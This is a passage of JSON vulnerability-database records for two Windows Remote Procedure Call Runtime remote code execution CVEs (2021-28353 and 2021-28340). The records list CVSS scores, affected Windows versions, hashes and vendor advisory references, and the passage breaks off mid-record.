Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-17T09:58:44", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28353"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-17T09:58:44", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"}], "hash": "460e1cba4701a2cf8d10f6c835650fe1a714a550efdec5b325f6992b02242cc3", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "82f042e5d4fed205981e7821e38a5395", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "c215fd8747804f22d38978ae9b5cee23", "key": "references"}, {"hash": "a8173ac408be479d0274479c52b82c47", "key": "extraReferences"}, {"hash": "88e8be8cd126081782597b415bd9d255", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "fa7d6b4c1611cd4d76c884c3338dcfbf", "key": "cvelist"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "9acace2388b344d4fa64bf571e1ea2b8", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "932da8db5e6348cc13f36dfa8966b423", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28353", "id": "CVE-2021-28353", "immutableFields": [], "lastseen": "2021-04-17T09:58:44", "modified": "2021-04-16T21:08:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"], "reporter": "cve@mitre.org", "title": "CVE-2021-28353", "type": "cve", "viewCount": 2}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-17T09:58:44"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "fa7d6b4c1611cd4d76c884c3338dcfbf"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "9acace2388b344d4fa64bf571e1ea2b8"}, {"key": "extraReferences", "hash": "a8173ac408be479d0274479c52b82c47"}, {"key": "href", "hash": "88e8be8cd126081782597b415bd9d255"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "932da8db5e6348cc13f36dfa8966b423"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "c215fd8747804f22d38978ae9b5cee23"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "82f042e5d4fed205981e7821e38a5395"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "47ad07015eadb3f810322c3b1bde466a93d79ca0d8b04a82275a73514ad0126e", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28353"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976112861186", "text": " NEW: CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Rmd0kalZ08?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28353"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28340", "bulletinFamily": "NVD", "title": "CVE-2021-28340", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T18:45:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28340", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"], "cvelist": ["CVE-2021-28340"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28340"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["MS:CVE-2021-28340"], "type": "mscve"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"}], "hash": "fc208eadb6660ed4de74ba23973722fe3994df6b97e1980549ed475d123f5091", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "0b502ca27cbe46b330be41a57f67c69e", "key": "cvelist"}, {"hash": "fb0a8e277bd9bb1ee90edd3c37c2caf7", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "2edbee9d7c2a69dd022f29b97cdbd95f", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8484e762a1e18d5479147244c612218a", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9a4d6b69ea72bb92c154881ed80c5689", "key": "title"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}, {"hash": "84f4f1a8a50a0249fcf4fd36f122c154", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28340", "id": "CVE-2021-28340", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"], "reporter": "cve@mitre.org", "title": "CVE-2021-28340", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28340"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": 